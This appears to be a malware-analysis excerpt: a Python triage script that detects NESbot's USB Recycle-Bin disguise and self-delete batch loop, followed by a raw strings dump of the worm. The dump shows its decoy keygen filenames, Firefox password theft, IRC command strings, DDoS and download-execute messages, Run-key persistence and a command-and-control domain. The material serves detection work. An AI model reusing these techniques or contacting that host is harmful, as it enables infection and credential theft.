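The NESbot strings above spell out two on-disk artifacts a responder can look for on a removable drive or a host image. The first is the drive disguise: an autorun.inf whose icon line points into SHELL32.dll, next to a Desktop.ini whose [.ShellClassInfo] CLSID is {645FF040-5081-101B-9F08-00AA002F954E}, the shell's Recycle Bin class, so the folder holding the dropped files is rendered as a Recycle Bin. The second is the removeMe%i%i%i%i.bat self-delete loop assembled from del "%s">nul, ping 0.0.0.0>nul and if exist "%s" goto Repeat. The Python below is an added triage example, not the report's or the malware's code: it writes a constructed sample drive into a temporary directory and flags those three artifacts, leaving an unrelated file alone. The autorun.inf open= key, the dropper path C:\dropper.exe and the sample filenames are assumptions; the dump shows only the icon line, not which launch key the worm uses.

```python
import re
import tempfile
from pathlib import Path

# CLSID from the "[.ShellClassInfo]" / "CLSID={...}" strings: the shell's Recycle Bin
# class. A folder whose Desktop.ini carries it is rendered as the Recycle Bin, which
# hides the dropped files from a casual look at the drive.
RECYCLE_BIN_CLSID = "{645FF040-5081-101B-9F08-00AA002F954E}"

# "icon=%SystemRoot%\system32\SHELL32.dll,N" from the autorun.inf strings (N is 2 or 4 here).
ICON_RE = re.compile(r"^icon\s*=\s*%SystemRoot%\\system32\\SHELL32\.dll,\d+\s*$", re.I | re.M)
# Keys autorun.inf can use to launch a file when the drive is opened.
LAUNCH_RE = re.compile(r"^(?:open|shellexecute|shell\\\w+\\command)\s*=\s*(.+?)\s*$", re.I | re.M)

# Self-delete loop assembled from three strings in the NESbot dump:
# del "%s">nul / ping 0.0.0.0>nul / if exist "%s" goto Repeat
SELF_DELETE_RE = re.compile(
    r'del\s+"[^"]+"\s*>\s*nul.*?ping\s+0\.0\.0\.0\s*>\s*nul.*?if\s+exist\s+"[^"]+"\s+goto\s+\w+',
    re.I | re.S,
)


def classify_autorun_inf(text: str) -> list:
    flags = []
    if ICON_RE.search(text):
        flags.append("shell32-icon-disguise")
    m = LAUNCH_RE.search(text)
    if m and m.group(1).lower().endswith(".exe"):
        flags.append("launches-exe:" + m.group(1))
    return flags


def classify_desktop_ini(text: str) -> list:
    return ["recycle-bin-clsid"] if RECYCLE_BIN_CLSID.lower() in text.lower() else []


def classify_batch(text: str) -> list:
    return ["self-delete-loop"] if SELF_DELETE_RE.search(text) else []


CLASSIFIERS = {"autorun.inf": classify_autorun_inf, "desktop.ini": classify_desktop_ini}


def triage_drive(root: Path) -> dict:
    """Walk a mounted or imaged removable drive; map each flagged file to its indicators."""
    findings = {}
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        name = p.name.lower()
        classify = CLASSIFIERS.get(name) or (classify_batch if name.endswith(".bat") else None)
        if classify is None:
            continue
        flags = classify(p.read_text(errors="replace"))
        if flags:
            findings[p.relative_to(root).as_posix()] = flags
    return findings


def build_sample_drive(root: Path) -> Path:
    """Constructed sample, not files from the analysed host. Contents follow the dump's
    strings; the 'open=' launch key and the dropper path are assumptions."""
    (root / "autorun.inf").write_text(
        "[autorun]\nopen=usbBlock.exe\nicon=%SystemRoot%\\system32\\SHELL32.dll,2\n")
    (root / "Desktop.ini").write_text("[.ShellClassInfo]\nCLSID=" + RECYCLE_BIN_CLSID + "\n")
    (root / "removeMe1234.bat").write_text(
        ':Repeat\ndel "C:\\dropper.exe">nul\nping 0.0.0.0>nul\nif exist "C:\\dropper.exe" goto Repeat\n')
    (root / "notes.txt").write_text("benign file, should not be flagged\n")
    return root


def demo() -> dict:
    """Build the sample in a temp dir and triage it; returns the findings map."""
    with tempfile.TemporaryDirectory() as d:
        return triage_drive(build_sample_drive(Path(d)))


if __name__ == "__main__":
    for path, flags in sorted(demo().items()):
        print(path, flags)
```

Run against a real mount point by calling triage_drive(Path("/mnt/usb")) or the drive letter on Windows. The batch regex spans line breaks on purpose: the three strings are written as separate lines by the bot, and the ping-as-sleep between del and the if exist retry is what distinguishes this loop from an ordinary cleanup script.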
winsvc32.exe_344:
.text
`.rdata
@.data
VkKeyScanA
keybd_event
EnumWindows
USER32.dll
ole32.dll
OLEAUT32.dll
GetWindowsDirectoryA
KERNEL32.dll
MSVCRT.dll
_acmdln
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
WS2_32.dll
URLDownloadToFileA
urlmon.dll
\SonyCam03-2008.zip
SonyCam03-2008.zip
SonyCam%d%d%d%d%d%d%d%d%d%d%d.JPG__VVV.photobucket.com
\temp\syz.tmp
gafgatew.tmp
_023.jpeg-VVV.myspace.com
edonkey2000\incoming\
Windows 2008 Server KeyGen.exe
DeadSpace KeyGen.exe
Half-Life 2 WORKS-ON-STEAM.exe
Left4Dead-STEAM-Online-Crack-WORKS-DECEMBER08.exe
Password Cracker.exe
FTP Cracker.exe
Hotmail Hacker.exe
Hotmail Cracker.exe
Norton Anti-Virus 2008 Enterprise Crack.exe
Kaspersky 2009 Full Suite Crack.exe
Microsoft Visual C 6 KeyGen.exe
Microsoft Visual Basic 6 KeyGen.exe
Microsoft Visual Studio 6 KeyGen.exe
Microsoft Visual Studio 2008 KeyGen.exe
Microsoft Visual Basic 2008 KeyGen.exe
Microsoft Visual C 2008 KeyGen.exe
MSN Live Password Cracker.exe
AOL Instant Messenger (AIM) Cracker.exe
AOL Triton Cracker.exe
ICQ Account Cracker.exe
AOL Password Cracker.exe
Counter-Strike KeyGen.exe
Counter-Strike Source KeyGen.exe
DivX Pro KeyGen.exe
RuneScape Cracker.exe
RuneScape Gold Exploit.exe
Windows XP Keygen
Windows XP Crack.exe
Windows Vista Keygen
Widnows Vista Crack.exe
Kaspersky Crck.exe
Kaspersky Keygen.exe
WOW Account Cracker.exe
Project 7 Private 4.8.exe
Virus Generator.exe
Virus Maker.exe
Nod32 Crack.exe
Nod32 Keygen.exe
Steam Account Stealer.exe
Myspace Cracker.exe
Myspace Bruteforce.exe
Myspace Attack.exe
Limewire Pro Downloader.exe
Tcpip Patch.exe
MSN Hacker 2008.exe
MSN Hacker 2009.exe
AOL Hacker 2008.exe
AOL Hacker 2009.exe
YIM HAcker 2008.exe
YIM HAcker 2009.exe
PhotoShop Keygen.exe
Adobe Photoshop Keygen.exe
Adobe Photoshop Crack.exe
Photoshop Crack.exe
Adobe Keygen.exe
Adobe Photoshop CS3 Keygen.exe
Adobe Photoshop CS4 KeyGen.exe
RuneScape 2008 - Newest Exploits.exe
SOFTWARE\Microsoft\Windows\CurrentVersion
%s\%s
keygen
KeyGen.exe
shlwapi.dll
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
ahoo] - Msg & File Sent To: %s Contacts.
%s%d%d%d.JPG.scr
%s%d%d%d
KeyGen
mozcrt19.dll
nspr4.dll
plds4.dll
plc4.dll
nssutil3.dll
sqlite3.dll
softokn3.dll
nss3.dll
PK11_GetInternalKeySlot
PK11_CheckUserPassword
[Pstore-FF] %s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Application Data\Mozilla\Firefox
\profiles.ini
SOFTWARE\Mozilla\Mozilla Firefox
signons1.txt
signons2.txt
signons3.txt
pstorec.dll
%s %s %s:%s
http:/
https:/
kWindows Security Alert
SbieDll.dll
TCPView - Sysinternals: VVV.sysinternals.com
Process Monitor - Sysinternals: VVV.sysinternals.com
Process Explorer - Sysinternals: VVV.sysinternals.com
File Monitor - Sysinternals: VVV.sysinternals.com
SwitchSniffer v1.3.2.0 Registered
SwitchSniffer v1.3.2.0 UnRegistered
Auto Start and Process Viewer : VVV.konradp.com
Remote Process Viewer for Windows Networks
Process Heap Viewer - VVV.SecurityXploded.com
KERNEL32.DLL
TASKMGR.EXE
%s gained access..
%s did not break in..
: %s!%s@%s (PM: "%s")
%s fail by: %s!%s@%s (tried: %s)
%s %s out.
%s out.
%s error: no user at:
%s invalid slot:
%s kill: threads
%s no threads
%s killed thread:
%s failed kt:
%s %s already running: .
%s faild 2 start %s, err: .
%s status: %s.
uptime: %s,
for: %s.
%s Bot installed on: %s.
sn] Msg & File Sent To %d Contacts.
by: %s!%s@%s
%s Advapi.dll Failed
%s PStore.dll Failed.
%s Main thread.
%s RuC.
%s mis paramter[s].
%s -SECURE-LOCKDOWN-INITIATED- You THOUGHT you had me :)
%s spreading disabled.
%s Thread Disabled.
FIREFOX Threads
%s ddosing %s:%s/%s secs.
%s unable to start ddos, error: %s
%s %s
%s seeding!
%s unable to download file
%s wget: %s location: %s.
%seraseme_%d%d%d%d%d.exe
%s Downloading update from: %s to: %s.
%s updating from %s
%s Couldn't open file for writing: %s.
%s File download: %.1fKB to: %s @ %.1fKB/sec.
%s Couldn't parse path, error:
%s Failed to create process: "%s", error:
%s Created process: "%s", PID:
%s Process Finished: "%s", Total Running Time: %s.
%s Update failed: Error executing file: %s.
%s Bad URL or DNS Error, error:
Ping Timeout? (%d-%d)%d/%d
PASS %s
NICK %s
USER NESv5 * 0 :%s
QUIT %s
JOIN
PRIVMSG
NICK
PONG %s
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
MODE %s %s
MODE %s %s %s
Torrent 1.8.1
%d.%d.%d.%d
kernel32.dll
user32.dll
advapi32.dll
RegEnumKeyExA
ws2_32.dll
wininet.dll
HttpOpenRequestA
HttpSendRequestA
FtpGetFileA
FtpPutFileA
InternetOpenUrlA
InternetCrackUrlA
Mozilla/4.0 (compatible)
netapi32.dll
dnsapi.dll
iphlpapi.dll
GetTcpTable
GetUdpTable
mpr.dll
mpr.dll
shell32.dll
shell32.dll
ShellExecuteA
ShellExecuteA
odbc32.dll
odbc32.dll
SQLDriverConnect
SQLDriverConnect
SQLSetEnvAttr
SQLSetEnvAttr
SQLExecDirect
SQLExecDirect
SQLAllocHandle
SQLAllocHandle
SQLFreeHandle
SQLFreeHandle
SQLDisconnect
SQLDisconnect
userenv.dll
userenv.dll
psapi.dll
psapi.dll
hXXp://checkip.dyndns.org
hXXp://checkip.dyndns.org
hXXp://VVV.whatismyip.com
hXXp://VVV.whatismyip.com
%s%%s
%s%%s
%s!%s@%s
%s!%s@%s
%s fail nigga. (%s!%s@%s) password: %s.
%s fail nigga. (%s!%s@%s) password: %s.
%s too many users logged in.
%s too many users logged in.
%s logged in.
%s logged in.
NESbot %s thread stopped. (%d thread(s) stopped.)
NESbot %s thread stopped. (%d thread(s) stopped.)
NESbot No %s thread found.
NESbot No %s thread found.
%s\removeMe%i%i%i%i.bat
%s\removeMe%i%i%i%i.bat
del "%s">nul
del "%s">nul
ping 0.0.0.0>nul
ping 0.0.0.0>nul
if exist "%s" goto Repeat
if exist "%s" goto Repeat
winsvc32.exe
winsvc32.exe
DataBlock.exe
DataBlock.exe
nhg24.zapto.org
nhg24.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
192.168.11.128
192.168.11.128